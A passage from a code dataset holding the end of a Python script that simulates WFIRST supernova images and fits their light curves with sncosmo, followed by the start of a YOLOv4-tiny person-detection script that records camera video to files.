norm=norm)\n cb = plt.colorbar(img, ax=ax, use_gridspec=True)\n cb.set_label('Count rate / e$^-$ s$^{-1}$')\n ax.set_xlabel('x / pixel')\n if j_ == 0:\n ax.set_ylabel('Sn Observation, t = {} days\\ny / pixel'.format(times[k]))\n else:\n ax.set_ylabel('y / pixel')\n if k_ == 0:\n ax.set_title(filters[j].upper())\n ax = plt.subplot(gs[1 + 3*k_, j_])\n img = ax.imshow(image_shifted.T / exptime, origin='lower', cmap='viridis', norm=norm)\n cb = plt.colorbar(img, ax=ax, use_gridspec=True)\n cb.set_label('Count rate / e$^-$ s$^{-1}$')\n ax.set_xlabel('x / pixel')\n if j_ == 0:\n ax.set_ylabel('Sn Reference\\ny / pixel')\n else:\n ax.set_ylabel('y / pixel')\n norm = simple_norm(image_diff / exptime, 'linear', percent=99.9)\n\n ax = plt.subplot(gs[2 + 3*k_, j_])\n img = ax.imshow(image_diff.T / exptime, origin='lower', cmap='viridis', norm=norm)\n cb = plt.colorbar(img, ax=ax, use_gridspec=True)\n cb.set_label('Count rate / e$^-$ s$^{-1}$')\n 
ax.set_xlabel('x / pixel')\n if j_ == 0:\n ax.set_ylabel('Difference\\ny / pixel')\n else:\n ax.set_ylabel('y / pixel')\n plt.tight_layout()\n plt.savefig('{}/galaxy_{}.pdf'.format(directory, counter))\n plt.close()\n\n\ndef get_sn_model(sn_type, setflag, t0=0.0, z=0.0):\n # salt2 for Ia, s11-* where * is 2004hx for IIL/P, 2005hm for Ib, and 2006fo for Ic\n # draw salt2 x1 and c from salt2_parameters (gaussian, x1: x0=0.4, sigma=0.9, c: x0=-0.04,\n # sigma = 0.1)\n # Hounsell 2017 gives SALT2 models over a wider wavelength range, given as sncosmo source\n # salt2-h17. both salt2 models have phases -20 to +50 days.\n # the above non-salt2 models don't give coverage, so trying new ones from the updated builtin\n # source list...\n\n if sn_type == 'Ia':\n sn_model = sncosmo.Model('salt2-h17')\n if setflag:\n x1, c = np.random.normal(0.4, 0.9), np.random.normal(-0.04, 0.1)\n sn_model.set(t0=t0, z=z, x1=x1, c=c)\n elif sn_type == 'Ib':\n sn_model = sncosmo.Model('snana-2007nc')\n if setflag:\n sn_model.set(t0=t0, z=z)\n elif sn_type == 'Ic':\n sn_model = sncosmo.Model('snana-2006lc')\n if setflag:\n sn_model.set(t0=t0, z=z)\n elif sn_type == 'IIP' or sn_type == 'II':\n sn_model = sncosmo.Model('snana-2007nv')\n if setflag:\n sn_model.set(t0=t0, z=z)\n elif sn_type == 'IIL':\n sn_model = sncosmo.Model('nugent-sn21')\n if setflag:\n sn_model.set(t0=t0, z=z)\n # TODO: add galaxy dust via sncosmo.F99Dust([r_v])\n\n return sn_model\n\n\ndef make_images(filters, pixel_scale, sn_type, times, exptime, filt_zp, psf_comp_filename,\n dark_img, flat_img, readnoise, t0):\n nfilts = len(filters)\n ntimes = len(times)\n\n # assuming surface brightnesses vary between roughly mu_e = 18-23 mag/arcsec^2 (mcgaugh\n # 1995, driver 2005, shen 2003 -- assume shen 2003 gives gaussian with mu=20.94, sigma=0.74)\n\n mu_0 = np.random.normal(20.94, 0.74)\n # elliptical galaxies approximated as de Vaucouleurs (n=4) sersic profiles, spirals as\n # exponentials (n=1). axial ratios vary 0.5-1 for ellipticals and 0.1-1 for spirals\n rand_num = np.random.uniform()\n n_type = 4 if rand_num < 0.5 else 1\n # randomly draw the axial ratio from 0.5/0.1 to 1, depending on sersic index\n e_disk = np.random.uniform(0.5 if n_type == 4 else 0.1, 1.0)\n # position angle can be uniformly drawn [0, 360) as we convert to radians elsewhere\n pa_disk = np.random.uniform(0, 360)\n # half-light radius can be uniformly drawn between two reasonable radii\n lr_low, lr_high = 0.3, 2.5\n half_l_r = np.random.uniform(lr_low, lr_high)\n # L(< R) / Ltot = \\gamma(2n, x) / \\Gamma(2n); scipy.special.gammainc is the lower incomplete over the\n # regular gamma function. Thus gammaincinv is the inverse to gammainc, solving\n # L(< r) / Ltot = Y, where Y is a large fraction\n y_frac = 0.75\n x_ = gammaincinv(2*n_type, y_frac)\n # however, x = bn * (R/Re)**(1/n), so we have to solve for R now, approximating bn; in arcsec\n offset_r = (x_ / (2*n_type - 1/3))**n_type * half_l_r
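\n # (illustrative numbers, not executed: for an exponential disc, n=1, enclosing\n # Y = 0.75 of the light gives x = gammaincinv(2, 0.75) ~ 2.69, and with the\n # approximation b_1 ~ 2*1 - 1/3 ~ 1.67 the offset radius comes out as roughly\n # (2.69/1.67)**1 ~ 1.6 half-light radii)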
\n # redshift randomly drawn between two values uniformly\n z_low, z_high = 0.2, 1.0\n z = np.random.uniform(z_low, z_high)\n\n cm_exp = np.array([0.00077, 0.01077, 0.07313, 0.37188, 1.39727, 3.56054, 4.74340, 1.78732])\n vm_exp_sqrt = np.array([0.02393, 0.06490, 0.13580, 0.25096, 0.42942, 0.69672, 1.08879,\n 1.67294])\n cm_dev = np.array([0.00139, 0.00941, 0.04441, 0.16162, 0.48121, 1.20357, 2.54182, 4.46441,\n 6.22821, 6.15393])\n vm_dev_sqrt = np.array([0.00087, 0.00296, 0.00792, 0.01902, 0.04289, 0.09351, 0.20168, 0.44126,\n 1.01833, 2.74555])\n\n psf_comp = np.load(psf_comp_filename)\n\n # this requires re-normalising as Hogg & Lang (2013) created profiles with unit intensity at\n # their half-light radius, with total flux for the given profile simply being the sum of the\n # MoG coefficients, cm, so we ensure that sum(cm) = 1 for normalisation purposes\n cms = cm_dev / np.sum(cm_dev) if n_type == 4 else cm_exp / np.sum(cm_exp)\n # Vm is always circular so this doesn't need to be a full matrix, but PSF m/V do need to\n vms = np.array(vm_dev_sqrt)**2 if n_type == 4 else np.array(vm_exp_sqrt)**2\n\n # the 0.75 mag is really 2.5 * log10(2), for double the flux, given that the area is that within the half-light radius\n mag = mu_0 - 2.5 * np.log10(np.pi * half_l_r**2 * e_disk) - 2.5 * np.log10(2)\n\n # since everything is defined in units of half-light radius, the \"semi-major axis\" is always\n # one, with the semi-minor axis simply being the axial ratio (b/a, not to be confused with\n # the eccentricity sqrt(1 - (b/a)**2) or the ellipticity 1 - b/a) of the ellipse\n a, b = 1, e_disk\n t = np.radians(pa_disk)\n Rg = np.array([[-a * np.sin(t), b * np.cos(t)], [a * np.cos(t), b * np.sin(t)]])\n Vgm_unit = np.matmul(Rg, np.transpose(Rg))\n\n endflag = 0\n while endflag == 0:\n # random offsets for the star should be in arcseconds; pixel scale is 0.11 arcsecond/pixel\n rand_ra = -offset_r + np.random.random_sample() * 2 * offset_r\n rand_dec = -offset_r + np.random.random_sample() * 2 * offset_r\n # the full equation for a shifted, rotated ellipse, with semi-major axis\n # originally aligned with the y-axis, is given by:\n # ((x-p)cos(t)-(y-q)sin(t))**2/b**2 + ((x-p)sin(t) + (y-q)cos(t))**2/a**2 = 1\n p = 0\n q = 0\n x = rand_ra\n y = rand_dec\n t = np.radians(pa_disk)\n a = offset_r\n b = e_disk * offset_r\n if (((((x - p) * np.cos(t) - (y - q) * np.sin(t)) / b)**2 +\n (((x - p) * np.sin(t) + (y - q) * np.cos(t)) / a)**2 <= 1) and\n ((((x - p) * np.cos(t) - (y - q) * np.sin(t)) / b)**2 +\n (((x - p) * np.sin(t) + (y - q) * np.cos(t)) / a)**2 > 0.1)):\n endflag = 1\n\n sn_model = get_sn_model(sn_type, 1, t0=t0, z=z)\n # pretending that F125W on WFC3/IR is 2MASS J, we set the absolute magnitude of a\n # type Ia supernova to J = -19.0 (Meikle 2000). 
We set the supernova to a star of the closest\n # blackbody (10000 K; Zheng 2017) -- the code uses the Johnson I magnitude, but Phillips (1993) says that\n # is also ~M = -19 -- currently just setting absolute magnitudes to -19, but this could change\n # if needed\n sn_model.set_source_peakabsmag(-19.0, 'f125w', 'ab')\n\n images_with_sn = []\n images_without_sn = []\n diff_images = []\n\n # things that are needed to create the astropy.table.Table for use in fit_lc:\n # time, band (name, see registered bandpasses), flux, fluxerr [both just derived from an\n # image somehow], zp, zpsys [zeropoint and name of system]\n\n time_array = []\n band_array = []\n flux_array = []\n fluxerr_array = []\n zp_array = []\n zpsys_array = []\n\n # given some zodiacal light flux, in erg cm^-2 s^-1 A^-1 arcsec^-2, convert to a magnitude\n # using the ST zeropoint, then convert back to a count rate\n zod_flux = 2e-18 # erg/cm^2/s/A/arcsec^2\n zod_mag = -2.5 * np.log10(zod_flux) - 21.1 # st mag system\n zod_count = 10**(-1/2.5 * (zod_mag - filt_zp[0])) # currently using an AB ZP...\n gal_params = [mu_0, n_type, e_disk, pa_disk, half_l_r, offset_r, Vgm_unit, cms, vms, mag]\n # currently assuming a simple half-pixel dither; TODO: check if this is right and update\n second_gal_offsets = np.empty((nfilts, 2), float)\n for j in range(0, nfilts):\n # define a random pixel offset ra/dec\n offset_ra, offset_dec = np.random.uniform(0.01, 0.99), np.random.uniform(0.01, 0.99)\n sign = -1 if np.random.uniform(0, 1) < 0.5 else 1\n # the non-reference image should be offset by half a pixel, wrapped around [0, 1]\n second_gal_offsets[j, 0] = (offset_ra + sign * 0.5 + 1) % 1\n second_gal_offsets[j, 1] = (offset_dec + sign * 0.5 + 1) % 1\n image = mog_galaxy(pixel_scale, filt_zp[j], psf_comp[j], gal_params +\n [offset_ra, offset_dec])\n q = np.where(image < 0)\n image[q] = 1e-8\n image = add_background(image, zod_count)\n image = set_exptime(image, exptime)\n image = add_poisson(image)\n image = mult_flat(image, flat_img)\n image = add_dark(image, dark_img)\n image = add_read(image, readnoise)\n images_without_sn.append(image)\n\n true_flux = []\n for k in range(0, ntimes):\n images = []\n images_diff = []\n for j in range(0, nfilts):\n image_shifted = images_without_sn[j]\n # TODO: add exposure and readout time so that exposures are staggered in time\n time = times[k] + t0\n\n # get the apparent magnitude of the supernova at a given time; first get the\n # appropriate filter for the observation\n bandpass = sncosmo.get_bandpass(filters[j])\n # time should be in days\n m_ia = sn_model.bandmag(bandpass, magsys='ab', time=time)\n if np.isnan(m_ia):\n m_ia = -2.5 * np.log10(0.01) + filt_zp[j]\n\n # the 'star' will have a distance based on the redshift of the galaxy, given by\n # m - M = \\mu = 42.38 - 5 log10(h) + 5 log10(z) + 5 log10(1+z) where h = 0.7\n # (given by H0 = 100h km/s/Mpc), based on cz = H0d, \\mu = 5 log10(dL) - 5, dL = (1+z)d,\n # and 5log10(c/100km/s/Mpc / pc) = 42.38.\n # h = 0.7\n # mu = 42.38 - 5 * np.log10(h) + 5 * np.log10(z) + 5 * np.log10(1+z)\n # dl = 10**(mu/5 + 1)\n # M_ia = -19\n # m_ia = M_ia + mu\n\n # TODO: add background noise.\n # background comes from jwst_backgrounds.background, converted from MJy/sr to\n # mJy/pixel, converted to counts through the filter and zp I guess?\n # if cosmic rays are needed then figure out what stips does for that...\n offset_ra, offset_dec = second_gal_offsets[j, :]\n image = mog_galaxy(pixel_scale, filt_zp[j], psf_comp[j],\n gal_params + [offset_ra, offset_dec])\n image = mog_add_psf(image, [rand_ra / pixel_scale, rand_dec / pixel_scale, 
m_ia],\n filt_zp[j], psf_comp[j])\n q = np.where(image < 0)\n image[q] = 1e-8\n image = add_background(image, zod_count)\n image = set_exptime(image, exptime)\n image = add_poisson(image)\n image = mult_flat(image, flat_img)\n image = add_dark(image, dark_img)\n image = add_read(image, readnoise)\n\n images.append(image)\n image_diff = image - image_shifted\n images_diff.append(image_diff)\n\n time_array.append(time)\n band_array.append(filters[j])\n\n x_cent, y_cent = (image.shape[0]-1)/2, (image.shape[1]-1)/2\n xind, yind = np.floor(rand_ra / pixel_scale + x_cent).astype(int), np.floor(rand_dec / pixel_scale + y_cent).astype(int)\n N = 4\n\n # current naive sum the entire (box) 'aperture' flux of the Sn, correcting for\n # exposure time in both counts and uncertainty\n diff_sum = np.sum(image_diff[xind-N:xind+N+1, yind-N:yind+N+1]) / exptime\n diff_sum = max(diff_sum, 0.01)\n diff_sum_err = np.sqrt(np.sum(image[xind-N:xind+N+1, yind-N:yind+N+1] +\n image_shifted[xind-N:xind+N+1, yind-N:yind+N+1])) / exptime\n flux_array.append(diff_sum)\n fluxerr_array.append(diff_sum_err)\n zp_array.append(filt_zp[j]) # filter-specific zeropoint\n zpsys_array.append('ab')\n\n true_flux.append(10**(-1/2.5 * (m_ia - filt_zp[j])))\n\n images_with_sn.append(images)\n diff_images.append(images_diff)\n\n lc_data = [np.array(time_array), np.array(band_array), np.array(flux_array),\n np.array(fluxerr_array), np.array(zp_array), np.array(zpsys_array)]\n true_flux = np.array(true_flux)\n\n param_names = ['z', 't0']\n if sn_type == 'Ia':\n param_names += ['x0', 'x1', 'c']\n else:\n param_names += ['amplitude']\n sn_params = [sn_model[q] for q in param_names]\n return images_with_sn, images_without_sn, diff_images, lc_data, sn_params, true_flux\n\n\ndef fit_lc(lc_data, sn_types, directory, filters, counter, figtext, ncol, minsnr, sn_priors,\n filt_zp):\n x2s = np.empty(len(sn_types), float)\n bestfit_models = []\n bestfit_results = []\n fit_time = 0\n largest_z = 2.5\n dz = 0.01\n z_array = np.arange(0, largest_z+1e-10, dz)\n min_counts = 0.0001\n for i, sn_type in enumerate(sn_types):\n start = timeit.default_timer()\n params = ['z', 't0']\n if sn_type == 'Ia':\n params += ['x0', 'x1', 'c']\n else:\n params += ['amplitude']\n sn_model = get_sn_model(sn_type, 0)\n # place upper limits on the redshift probeable, by finding the z at which each filter drops\n # out of being in overlap with the model\n z_upper_band = np.empty(len(filters), float)\n for p in range(0, len(filters)):\n z = 0\n while sn_model.bandoverlap(filters[p], z=z):\n z += dz\n if z > largest_z:\n break # otherwise this will just keep going forever for very red filters\n z_upper_band[p] = min(largest_z, z - dz)\n z_upper_count = np.empty(len(filters), float)\n z_lower_count = np.empty(len(filters), float)\n # the lower limits on z -- for this model -- are, assuming a minsnr detection in that\n # filter, a model flux in the given system of, say, 0.001 counts/s; a very low goal, but\n # one that avoids bluer SNe being selected when they would drop out of the detection. Also\n # avoids models from failing to calculate an amplitude... 
Similarly, we can calculate the\n # maximum redshift for a blue filter to have a \"detection\".\n for p in range(0, len(filters)):\n countrate = np.empty_like(z_array)\n for q, z_init in enumerate(z_array):\n sn_model.set(z=z_init)\n countrate[q] = sn_model.bandflux(filters[p], time=0, zp=filt_zp[p], zpsys='ab')\n z_upper_count[p] = z_array[np.where(countrate > min_counts)[0][-1]]\n z_lower_count[p] = z_array[np.where(countrate > min_counts)[0][0]]\n # set the bounds on z to be at most the smallest of those available by the given filters in\n # the set being fit here\n z_min = np.amax(z_lower_count)\n z_max = min(np.amin(z_upper_band), np.amin(z_upper_count))\n bounds = {'z': (z_min, z_max)}\n # x1 and c bounded by 3.5-sigma regions (x1: mu=0.4, sigma=0.9, c: mu=-0.04, sigma = 0.1)\n if sn_type == 'Ia':\n bounds.update({'x1': (-2.75, 3.55), 'c': (-0.39, 0.31)})\n result = None\n fitted_model = None\n for z_init in np.linspace(z_min, z_max, 50):\n sn_model.set(z=z_init)\n result_temp, fitted_model_temp = sncosmo.fit_lc(lc_data, sn_model, params,\n bounds=bounds, minsnr=minsnr,\n guess_z=False)\n if result is None or result_temp.chisq < result.chisq:\n result = result_temp\n fitted_model = fitted_model_temp\n # result, fitted_model = sncosmo.mcmc_lc(lc_data, sn_model, params, bounds=bounds,\n # minsnr=minsnr)\n bestfit_models.append(fitted_model)\n bestfit_results.append(result)\n try:\n x2s[i] = result.chisq\n except AttributeError:\n x2s[i] = sncosmo.chisq(lc_data, fitted_model)\n fit_time += timeit.default_timer()-start\n\n print('Fit: {:.2f}s'.format(fit_time))\n probs = sn_priors*np.exp(-0.5 * x2s)\n probs /= np.sum(probs)\n best_ind = np.argmax(probs)\n best_r = bestfit_results[best_ind]\n best_m = bestfit_models[best_ind]\n best_x2 = x2s[best_ind]\n\n figtext = [figtext[0], figtext[1] + '\\n' + r'$\\chi^2_{{\\nu={}}}$ = {:.3f}'.format(best_r.ndof,\n best_x2/best_r.ndof)]\n errors = best_r.errors\n model_params = best_m.parameters\n if sn_types[best_ind] == 'Ia':\n z_format = sncosmo.utils.format_value(model_params[0], errors.get('z'), latex=True)\n t0_format = sncosmo.utils.format_value(model_params[1], errors.get('t0'), latex=True)\n x0_format = sncosmo.utils.format_value(model_params[2], errors.get('x0'), latex=True)\n x1_format = sncosmo.utils.format_value(model_params[3], errors.get('x1'), latex=True)\n c_format = sncosmo.utils.format_value(model_params[4], errors.get('c'), latex=True)\n figtext.append('Type {}: $z = {}$\\n$t_0 = {}$\\n$x_0 = {}$'.format(sn_types[best_ind],\n z_format, t0_format, x0_format))\n if probs[0] > 0:\n p_sig = int(np.floor(np.log10(abs(probs[0]))))\n else:\n p_sig = 0\n # probabilities are <= 1, so switch to scientific notation once they drop below 1e-3\n if p_sig < -3:\n figtext.append('$x_1 = {}$\\n$c = {}$\\n$P(Ia|D) = {:.3f} \\\\times 10^{{{}}}$'.format(\n x1_format, c_format, probs[0]/10**p_sig, p_sig))\n else:\n figtext.append('$x_1 = {}$\\n$c = {}$\\n$P(Ia|D) = {:.3f}$'.format(x1_format, c_format,\n probs[0]))\n else:\n z_format = sncosmo.utils.format_value(model_params[0], errors.get('z'), latex=True)\n t0_format = sncosmo.utils.format_value(model_params[1], errors.get('t0'), latex=True)\n A_format = sncosmo.utils.format_value(model_params[2], errors.get('amplitude'), latex=True)\n figtext.append('Type {}: $z = {}$\\n$t_0 = {}$'.format(sn_types[best_ind],\n z_format, t0_format))\n if probs[0] > 0:\n p_sig = int(np.floor(np.log10(abs(probs[0]))))\n else:\n p_sig = 0\n if p_sig < -3:\n figtext.append('$A = {}$\\n$P(Ia|D) = {:.3f} \\\\times 10^{{{}}}$'.format(A_format, probs[0]/10**p_sig, p_sig))\n else:\n figtext.append('$A = 
{}$\\n$P(Ia|D) = {:.3f}$'.format(A_format, probs[0]))\n\n fig = sncosmo.plot_lc(lc_data, model=bestfit_models, xfigsize=15*ncol, tighten_ylim=False,\n ncol=ncol, figtext=figtext, figtextsize=2, model_label=sn_types)\n fig.tight_layout(rect=[0, 0.03, 1, 0.935])\n fig.savefig('{}/fit_{}.pdf'.format(directory, counter))\n\n # return the best-fitting result (not simply the last type fit), along with P(Ia|D)\n return best_r, probs[0]\n\n\nif __name__ == '__main__':\n # run_mins, n_runs = 30/60, 100\n # model_number(run_mins, n_runs)\n\n # sys.exit()\n\n ngals = 10\n pixel_scale = 0.11 # arcsecond/pixel\n directory = 'out_gals'\n\n # TODO: vary these parameters\n filters = ['z087', 'y106', 'w149', 'j129', 'h158', 'f184']\n # 1 count/s for infinite aperture, hounsell17, AB magnitudes\n filt_zp = [26.39, 26.41, 27.50, 26.35, 26.41, 25.96]\n\n for j in range(0, len(filters)):\n f = pyfits.open('../../pandeia_data-1.0/wfirst/wfirstimager/filters/{}.fits'\n .format(filters[j]))\n data = f[1].data\n dispersion = np.array([d[0] for d in data])\n transmission = np.array([d[1] for d in data])\n # both F184 and W149 extend 0.004 microns into the 2 micron region, beyond the wavelength range of\n # the less extended models (19990A, or 1.999 microns). Thus we slightly chop the ends off\n # these filters, and set the final 'zero' to 1.998 microns:\n if filters[j] == 'f184' or filters[j] == 'w149':\n ind_ = np.where(dispersion < 1.999)[0][-1]\n transmission[ind_:] = 0\n q_ = np.argmax(transmission)\n if transmission[q_] == transmission[q_+1]:\n q_ += 1\n imin = np.where(transmission[:q_] == 0)[0][-1]\n imax = np.where(transmission[q_:] == 0)[0][0] + q_ + 1\n bandpass = sncosmo.Bandpass(dispersion[imin:imax], transmission[imin:imax],\n wave_unit=u.micron, name=filters[j])\n sncosmo.register(bandpass)\n # TODO: vary exptime to explore the effects of exposure cadence on observation\n exptime = 1000 # seconds\n sn_types = ['Ia', 'Ib', 'Ic', 'II']\n\n t_low, t_high, t_interval = -10, 35, 15\n times = np.arange(t_low, t_high+1e-10, t_interval)\n\n # #### WFC3 PSFs ####\n # psf_comp_filename = '../PSFs/wfc3_psf_comp.npy'\n # filters = ['F160W'] # ['F105W', 'F125W', 'F160W']\n # filt_zp = [25.95] # [27.69, 28.02, 28.19] - st; [26.27, 26.23, 25.95] - ab\n # pixel_scale = 0.13\n # psf_names = ['../../../Buffalo/PSFSTD_WFC3IR_F{}W.fits'.format(q) for q in [105, 125, 160]]\n\n psf_comp_filename = '../PSFs/wfirst_psf_comp.npy'\n # psf_names = ['../PSFs/{}.fits'.format(q) for q in filters]\n\n # oversampling, noise_removal, N_comp, cut = 4, 0, 10, 0.01\n # pmf.psf_mog_fitting(psf_names, oversampling, noise_removal, psf_comp_filename, cut, N_comp,\n # 'wfc3' if 'wfc3' in psf_comp_filename else 'wfirst')\n # sys.exit()\n\n f = pyfits.open('../err_rdrk_wfi.fits')\n # dark current is in counts/s, so requires correcting by the exposure time\n dark_img = f[1].data * exptime\n f = pyfits.open('../err_flat_wfi.fits')\n flat_img = f[1].data\n # currently what is in stips, claimed 'max ramp, lowest noise'\n readnoise = 12\n t0 = 50000\n minsnr = 5\n\n ncol = min(3, len(filters))\n\n # flag for whether we should print a representative reference/science/difference image, or\n # all of the frames - useful for avoiding huge figures\n random_flag = 1\n\n # priors on supernova types: very roughly, these are the relative fractions of each type in\n # the universe, to set the relative likelihoods of the observations with no information; these\n # should follow sn_types as [Ia, Ib, Ic, II]. Boissier & Prantzos 2009 quote, roughly and\n # drawn by eye: Ibc/II ~ 0.3, Ic/Ib ~ 1.25, Ia/CC ~ 0.25. 
Hakobyan 2014, table 8, give:\n NiaNcc, NibcNii, NicNib = 0.44, 0.36, 2.12\n # given a/b=x we get a = x/(1+x) and b = 1/(1+x) = 1 - x/(1+x), so we can convert these to\n # relative fractions:\n fia, fcc = NiaNcc / (1 + NiaNcc), 1 - NiaNcc / (1 + NiaNcc)\n fibc, fii = fcc * NibcNii / (1 + NibcNii), fcc * (1 - NibcNii / (1 + NibcNii))\n fib, fic = fibc * (1 - NicNib / (1 + NicNib)), fibc * NicNib / (1 + NicNib)\n sn_priors = np.array([fia, fib, fic, fii])\n\n # z, t0, x0, x1, c, A[mplitude], maintaining the ability to track Ia/CC, depending on which are\n # randomly drawn\n true_params = np.ones((ngals, 6), float) * -999\n fit_params = np.ones((ngals, 6, 2), float) * -999\n\n i = 0\n colours = ['k', 'r', 'b', 'g', 'c', 'm', 'orange']\n\n types = []\n probs = []\n\n while i < ngals:\n type_ind = np.random.choice(len(sn_types))\n print('==== {} == {} ===='.format(i+1, sn_types[type_ind]))\n start = timeit.default_timer()\n images_with_sn, images_without_sn, diff_images, lc_data, sn_params, true_flux = \\\n make_images(filters, pixel_scale, sn_types[type_ind], times, exptime, filt_zp,\n psf_comp_filename, dark_img, flat_img, readnoise, t0)\n print(\"Make: {:.2f}s\".format(timeit.default_timer()-start))\n lc_data_table = Table(data=lc_data,\n names=['time', 'band', 'flux', 'fluxerr', 'zp', 'zpsys'])\n if not np.amax(lc_data_table['flux'].data / lc_data_table['fluxerr'].data) >= minsnr:\n continue\n\n figtext = []\n if sn_types[type_ind] == 'Ia':\n z_, t_, x0_, x1_, c_ = sn_params\n figtext.append('Type {}: $z = {:.3f}$\\n$t_0 = {:.1f}$\\n'\n '$x_0 = {:.5f}$'.format(sn_types[type_ind], z_, t_, x0_))\n figtext.append('$x_1 = {:.5f}$\\n$c = {:.5f}$'.format(x1_, c_))\n else:\n z_ = sn_params[0]\n t_ = sn_params[1]\n A_ = sn_params[2]\n A_sig = int(np.floor(np.log10(abs(A_))))\n figtext.append('Type {}: $z = {:.3f}$\\n$t_0 = {:.1f}$'.format(\n sn_types[type_ind], z_, t_))\n figtext.append('$A = {:.3f} \\\\times 10^{{{}}}$'.format(A_/10**A_sig, A_sig))\n\n result, prob = fit_lc(lc_data_table, sn_types, directory, filters, i+1, figtext, ncol,\n minsnr, sn_priors, filt_zp)\n make_figures(filters, images_with_sn, images_without_sn, diff_images, exptime,\n directory, i+1, times, random_flag)\n\n gs = gridcreate('09', 1, 1, 0.8, 15)\n ax = plt.subplot(gs[0])\n for c, filter_ in zip(colours, filters):\n q = lc_data_table['band'] == filter_\n ax.errorbar(lc_data_table['time'][q], lc_data_table['flux'][q] - true_flux[q],\n yerr=lc_data_table['fluxerr'][q], fmt='{}.'.format(c), label=filter_)\n ax.legend(shadow=False, framealpha=0)\n ax.axhline(0, c='k', ls='--')\n ax.set_xlabel('Time')\n ax.set_ylabel('Flux difference (fit - true)')\n plt.tight_layout()\n plt.savefig('{}/flux_ratio_{}.pdf'.format(directory, i+1))\n\n if sn_types[type_ind] == 'Ia':\n true_params[i, :-1] = sn_params\n else:\n true_params[i, [0, 1, -1]] = sn_params\n if 'x0' in result.param_names:\n fit_params[i, :-1, 0] = result.parameters\n fit_params[i, :-1, 1] = [result.errors[q] for q in ['z', 't0', 'x0', 'x1', 'c']]\n else:\n fit_params[i, [0, 1, -1], 0] = result.parameters\n fit_params[i, [0, 1, -1], 1] = [result.errors[q] for q in ['z', 't0', 'amplitude']]\n\n # if the original SN is a Ia, then prob will be a \"goodness of Ia-ness\", but if the SN is\n # a CC (Ib/Ic/II) then the probability will be a \"badness of CC-ness\"; if we're fitting a\n # true Ia then we want the probability to be high, otherwise it should be low, but in\n # all cases the probability is P(Ia|D) = P(Ia) * p(D|Ia) / sum_j P(j) p(D|j)\n 
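# (illustrative check with made-up numbers, not executed: the priors above work out\n # to sn_priors ~ [0.31, 0.06, 0.12, 0.51]; with chi-squared values of, say,\n # x2s = [4., 9., 9., 6.], probs = sn_priors * np.exp(-0.5 * np.array(x2s)) normalises\n # to P(Ia|D) ~ 0.6 -- the Ia prior and the lowest chi-squared reinforce each other)\n 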
types.append(sn_types[type_ind])\n probs.append(prob)\n\n i += 1\n\n gs_ = gridcreate('asjhfs', 2, 3, 0.8, 15)\n axs = [plt.subplot(gs_[i]) for i in range(0, 6)]\n for i, (ax, name) in enumerate(zip(axs, ['z', 't0', 'x0', 'x1', 'c', 'A'])):\n q = (fit_params[:, i, 0] > -999) & (true_params[:, i] > -999)\n ax.errorbar(np.arange(1, ngals+1)[q], fit_params[q, i, 0] - true_params[q, i],\n yerr=fit_params[q, i, 1], fmt='k.')\n ax.axhline(0, c='k', ls='--')\n ax.set_xlabel('Count')\n ax.set_ylabel('{} difference (fit - true)'.format(name))\n plt.tight_layout()\n plt.savefig('{}/derived_parameter_ratio.pdf'.format(directory))\n\n # TODO LIST:\n # 1) check k-corrections for SNANA lightcurves and get the best near/mid-IR lightcurves\n # 2) find physical bounds for lightcurve fitting to avoid unphysical model outputs\n # 3) anti-dither shift observations to remove most of the residual subtraction pattern\n","sub_path":"SN Sampling/sn_sampling.py","file_name":"sn_sampling.py","file_ext":"py","file_size_in_byte":39681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"522267502","text":"from tracking import Tracker, Trackable\nimport cv2\nimport numpy as np\nimport time\n\nframe_size = 416\nframe_count = 0\nmin_confidence = 0.5\nfont=cv2.FONT_HERSHEY_SIMPLEX\n\nheight = 0\nwidth = 0\nfpsFilt=0\n\ntrackers = []\ntrackables = {}\n\n#file_name = './video/test3.mp4'\noutput_name = './output/output_test4.mp4'\n\n# Load Yolo\nnet = cv2.dnn.readNet(\"./model/yolov4-tiny.weights\", \"./cfg/yolov4-tiny.cfg\")\nlayer_names = net.getLayerNames()\noutput_layers = [layer_names[i[0] - 1] for i in net.getUnconnectedOutLayers()]\n\nnet.setPreferableBackend(cv2.dnn.DNN_BACKEND_CUDA)\nnet.setPreferableTarget(cv2.dnn.DNN_TARGET_CUDA)\n# initialize Tracker\ntracker = Tracker()\n\n# initialize the video writer\nwriter = None\nwriter_frame_count = 0\nvideonumber = 0\n\n#gst_out2 = \"appsrc ! video/x-raw ! videoconvert ! x264enc tune=zerolatency bitrate=100 speed-preset=superfast ! rtph264pay config-interval=1 ! udpsink host=192.168.0.46 port=10000 sync=false\"\n\n#writer2 =cv2.VideoWriter(gst_out2,cv2.CAP_GSTREAMER,0,float(12),(640,480),True)\n\ndef writeFrame(img):\n # use the global writer state\n global writer\n global writer_frame_count\n global videonumber\n output_name = f\"./output/outputvideo_{videonumber}.mp4\"\n \n # rotate to a new output file every 120 written frames\n if writer_frame_count >= 120:\n writer = None\n videonumber += 1\n writer_frame_count = 0\n \n if writer is None and output_name is not None:\n fourcc = cv2.VideoWriter_fourcc(*\"mp4v\")\n writer = cv2.VideoWriter(output_name, fourcc, 6, (img.shape[1], img.shape[0]),True)\n \n if writer is not None:\n writer.write(img)\n writer_frame_count += 1\n\n\nvs = cv2.VideoCapture('v4l2src device=/dev/video0 ! video/x-raw, format=YUY2, framerate=30/1, width=640, height=480 ! videoconvert ! 
appsink', cv2.CAP_GSTREAMER)\n\n#vs = cv2.VideoCapture(file_name)\n# loop over the frames from the video stream\ncp_frame = np.zeros((480,640,3), dtype=np.uint8)\nfps_rate = vs.get(cv2.CAP_PROP_FPS)\n#prev_time = 0\nwhile True:\n ret, frame = vs.read()\n #cp_frame = frame.copy()\n\n #print(fps_rate)\n if frame is None:\n print('### No more frame ###')\n break\n # Start time capture\n frame_count += 1\n start_time = time.time()\n (height, width) = frame.shape[:2]\n\n # draw a horizontal line in the center of the frame\n\n # construct a blob for the YOLO model\n blob = cv2.dnn.blobFromImage(frame, 0.00392, (frame_size, frame_size), (0, 0, 0), True, crop=False)\n net.setInput(blob)\n outs = net.forward(output_layers) # run the object detection\n rects = []\n\n confidences = []\n boxes = []\n\n # detections may be people or other objects\n for out in outs:\n for detection in out:\n scores = detection[5:]\n class_id = np.argmax(scores) # pick the highest-scoring class\n confidence = scores[class_id] # and its confidence value\n # Filter only 'person'\n if class_id == 0 and confidence > min_confidence:\n\n # Object detected\n center_x = int(detection[0] * width)\n center_y = int(detection[1] * height)\n w = int(detection[2] * width)\n h = int(detection[3] * height)\n\n # Rectangle coordinates\n x = int(center_x - w / 